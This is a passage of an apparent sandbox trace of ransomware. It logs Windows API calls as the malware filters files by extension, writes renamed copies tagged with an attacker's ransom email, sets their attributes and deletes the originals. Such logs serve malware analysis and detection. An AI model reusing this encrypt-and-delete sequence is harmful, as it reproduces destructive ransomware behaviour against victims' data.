Office\\root\\CLIPART\\PUB60COR\\J0107130.WMF") returned 68 [0182.806] lstrlenW (lpString=".zip") returned 4 [0182.806] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.806] lstrlenW (lpString=".rar") returned 4 [0182.806] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.806] lstrlenW (lpString=".bz2") returned 4 [0182.806] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.806] lstrlenW (lpString=".7z") returned 3 [0182.806] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.806] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107130.WMF") returned 68 [0182.806] lstrlenW (lpString=".dbf") returned 4 [0182.806] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.806] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107130.WMF") returned 68 [0182.806] lstrlenW (lpString=".1cd") returned 4 [0182.806] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.806] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107130.WMF") returned 68 [0182.806] lstrlenW (lpString=".jpg") returned 4 [0182.806] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.807] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.807] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.807] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107132.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107132.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0182.807] GetLastError () returned 0x0 [0182.807] ReadFile (in: hFile=0x364, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0xbcfc, lpOverlapped=0x0) returned 1 [0182.810] WriteFile (in: hFile=0x36c, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xbd00, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xbd00, lpOverlapped=0x0) returned 1 [0182.812] ReadFile (in: hFile=0x364, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0182.812] WriteFile (in: hFile=0x36c, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0182.812] SetEndOfFile (hFile=0x36c) returned 1 [0182.812] CloseHandle (hObject=0x36c) returned 1 [0182.812] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.812] SetEndOfFile (hFile=0x364) returned 1 [0182.813] CloseHandle (hObject=0x364) returned 1 [0182.813] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107132.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0182.813] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107132.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107132.wmf")) returned 1 [0182.814] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107132.WMF") returned 68 [0182.814] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107132.WMF") returned 68 [0182.814] lstrlenW (lpString=".doc") returned 4 [0182.814] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.814] lstrlenW (lpString=".docx") returned 5 [0182.814] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0182.814] lstrlenW (lpString=".pdf") returned 4 [0182.814] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.814] lstrlenW (lpString=".xls") returned 4 [0182.814] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.814] lstrlenW (lpString=".xlsx") returned 5 [0182.814] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0182.814] lstrlenW (lpString=".ppt") returned 4 [0182.814] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.814] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107132.WMF") returned 68 [0182.814] lstrlenW (lpString=".zip") returned 4 [0182.814] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.814] lstrlenW (lpString=".rar") returned 4 [0182.814] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.814] lstrlenW (lpString=".bz2") returned 4 [0182.814] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.814] lstrlenW (lpString=".7z") returned 3 [0182.814] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.814] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107132.WMF") returned 68 [0182.814] lstrlenW (lpString=".dbf") returned 4 [0182.814] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.814] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107132.WMF") returned 68 [0182.814] lstrlenW (lpString=".1cd") returned 4 [0182.815] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.815] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107132.WMF") returned 68 [0182.815] lstrlenW (lpString=".jpg") returned 4 [0182.815] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.815] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.815] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.815] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107134.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107134.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0182.816] GetLastError () returned 0x0 [0182.816] ReadFile (in: hFile=0x364, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0xbd04, lpOverlapped=0x0) returned 1 [0182.818] WriteFile (in: hFile=0x36c, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xbd10, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xbd10, lpOverlapped=0x0) returned 1 [0182.820] ReadFile (in: hFile=0x364, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0182.820] WriteFile (in: hFile=0x36c, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0182.820] SetEndOfFile (hFile=0x36c) returned 1 [0182.820] CloseHandle (hObject=0x36c) returned 1 [0182.820] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.820] SetEndOfFile (hFile=0x364) returned 1 [0182.821] CloseHandle (hObject=0x364) returned 1 [0182.821] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107134.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0182.821] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107134.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107134.wmf")) returned 1 [0182.822] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107134.WMF") returned 68 [0182.822] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107134.WMF") returned 68 [0182.822] lstrlenW (lpString=".doc") returned 4 [0182.822] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.822] lstrlenW (lpString=".docx") returned 5 [0182.822] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0182.822] lstrlenW (lpString=".pdf") returned 4 [0182.822] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.822] lstrlenW (lpString=".xls") returned 4 [0182.822] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.822] lstrlenW (lpString=".xlsx") returned 5 [0182.822] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0182.822] lstrlenW (lpString=".ppt") returned 4 [0182.822] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.822] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107134.WMF") returned 68 [0182.822] lstrlenW (lpString=".zip") returned 4 [0182.822] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.822] lstrlenW (lpString=".rar") returned 4 [0182.822] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.822] lstrlenW (lpString=".bz2") returned 4 [0182.822] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.822] lstrlenW (lpString=".7z") returned 3 [0182.822] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.822] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107134.WMF") returned 68 [0182.822] lstrlenW (lpString=".dbf") returned 4 [0182.823] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.823] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107134.WMF") returned 68 [0182.823] lstrlenW (lpString=".1cd") returned 4 [0182.823] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.823] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107134.WMF") returned 68 [0182.823] lstrlenW (lpString=".jpg") returned 4 [0182.823] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.823] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.823] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.823] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107138.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107138.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0182.824] GetLastError () returned 0x0 [0182.824] ReadFile (in: hFile=0x364, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x4330, lpOverlapped=0x0) returned 1 [0183.187] WriteFile (in: hFile=0x36c, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x4340, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x4340, lpOverlapped=0x0) returned 1 [0183.188] ReadFile (in: hFile=0x364, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0183.188] WriteFile (in: hFile=0x36c, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0183.188] SetEndOfFile (hFile=0x36c) returned 1 [0183.189] CloseHandle (hObject=0x36c) returned 1 [0183.189] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.189] SetEndOfFile (hFile=0x364) returned 1 [0183.190] CloseHandle (hObject=0x364) returned 1 [0183.190] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107138.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0183.191] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107138.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107138.wmf")) returned 1 [0183.191] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107138.WMF") returned 68 [0183.191] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107138.WMF") returned 68 [0183.191] lstrlenW (lpString=".doc") returned 4 [0183.191] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0183.191] lstrlenW (lpString=".docx") returned 5 [0183.191] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0183.191] lstrlenW (lpString=".pdf") returned 4 [0183.191] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0183.191] lstrlenW (lpString=".xls") returned 4 [0183.191] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0183.191] lstrlenW (lpString=".xlsx") returned 5 [0183.191] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0183.191] lstrlenW (lpString=".ppt") returned 4 [0183.191] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0183.191] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107138.WMF") returned 68 [0183.191] lstrlenW (lpString=".zip") returned 4 [0183.191] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0183.191] lstrlenW (lpString=".rar") returned 4 [0183.192] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0183.192] lstrlenW (lpString=".bz2") returned 4 [0183.192] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0183.192] lstrlenW (lpString=".7z") returned 3 [0183.192] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0183.192] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107138.WMF") returned 68 [0183.192] lstrlenW (lpString=".dbf") returned 4 [0183.192] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0183.192] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107138.WMF") returned 68 [0183.192] lstrlenW (lpString=".1cd") returned 4 [0183.192] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0183.192] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107138.WMF") returned 68 [0183.192] lstrlenW (lpString=".jpg") returned 4 [0183.192] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0183.192] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.192] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.192] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107264.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107264.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0183.193] GetLastError () returned 0x0 [0183.193] ReadFile (in: hFile=0x364, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x1498, lpOverlapped=0x0) returned 1 [0183.194] WriteFile (in: hFile=0x36c, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x14a0, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x14a0, lpOverlapped=0x0) returned 1 [0183.195] ReadFile (in: hFile=0x364, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0183.195] WriteFile (in: hFile=0x36c, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0183.196] SetEndOfFile (hFile=0x36c) returned 1 [0183.196] CloseHandle (hObject=0x36c) returned 1 [0183.196] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.196] SetEndOfFile (hFile=0x364) returned 1 [0183.197] CloseHandle (hObject=0x364) returned 1 [0183.197] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107264.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0183.197] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107264.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107264.wmf")) returned 1 [0183.197] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107264.WMF") returned 68 [0183.197] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107264.WMF") returned 68 [0183.197] lstrlenW (lpString=".doc") returned 4 [0183.197] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0183.198] lstrlenW (lpString=".docx") returned 5 [0183.198] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0183.198] lstrlenW (lpString=".pdf") returned 4 [0183.198] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0183.198] lstrlenW (lpString=".xls") returned 4 [0183.198] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0183.198] lstrlenW (lpString=".xlsx") returned 5 [0183.198] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0183.198] lstrlenW (lpString=".ppt") returned 4 [0183.198] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0183.198] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107264.WMF") returned 68 [0183.198] lstrlenW (lpString=".zip") returned 4 [0183.198] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0183.198] lstrlenW (lpString=".rar") returned 4 [0183.198] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0183.198] lstrlenW (lpString=".bz2") returned 4 [0183.198] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0183.198] lstrlenW (lpString=".7z") returned 3 [0183.198] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0183.198] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107264.WMF") returned 68 [0183.198] lstrlenW (lpString=".dbf") returned 4 [0183.198] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0183.198] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107264.WMF") returned 68 [0183.198] lstrlenW (lpString=".1cd") returned 4 [0183.198] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0183.198] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107264.WMF") returned 68 [0183.198] lstrlenW (lpString=".jpg") returned 4 [0183.198] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0183.199] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.199] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.199] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107266.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107266.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0183.199] GetLastError () returned 0x0 [0183.199] ReadFile (in: hFile=0x364, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x16ec, lpOverlapped=0x0) returned 1 [0183.201] WriteFile (in: hFile=0x36c, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x16f0, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x16f0, lpOverlapped=0x0) returned 1 [0183.202] ReadFile (in: hFile=0x364, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0183.202] WriteFile (in: hFile=0x36c, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0183.202] SetEndOfFile (hFile=0x36c) returned 1 [0183.202] CloseHandle (hObject=0x36c) returned 1 [0183.202] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.203] SetEndOfFile (hFile=0x364) returned 1 [0183.203] CloseHandle (hObject=0x364) returned 1 [0183.203] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107266.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0183.204] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107266.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107266.wmf")) returned 1 [0183.204] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107266.WMF") returned 68 [0183.204] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107266.WMF") returned 68 [0183.204] lstrlenW (lpString=".doc") returned 4 [0183.204] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0183.204] lstrlenW (lpString=".docx") returned 5 [0183.204] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0183.204] lstrlenW (lpString=".pdf") returned 4 [0183.204] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0183.204] lstrlenW (lpString=".xls") returned 4 [0183.204] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0183.204] lstrlenW (lpString=".xlsx") returned 5 [0183.204] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0183.204] lstrlenW (lpString=".ppt") returned 4 [0183.204] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0183.205] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107266.WMF") returned 68 [0183.205] lstrlenW (lpString=".zip") returned 4 [0183.205] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0183.205] lstrlenW (lpString=".rar") returned 4 [0183.205] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0183.205] lstrlenW (lpString=".bz2") returned 4 [0183.205] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0183.205] lstrlenW (lpString=".7z") returned 3 [0183.205] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0183.205] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107266.WMF") returned 68 [0183.205] lstrlenW (lpString=".dbf") returned 4 [0183.205] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0183.205] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107266.WMF") returned 68 [0183.205] lstrlenW (lpString=".1cd") returned 4 [0183.205] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0183.205] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107266.WMF") returned 68 [0183.205] lstrlenW (lpString=".jpg") returned 4 [0183.205] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0183.205] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.205] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.205] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107280.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107280.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, 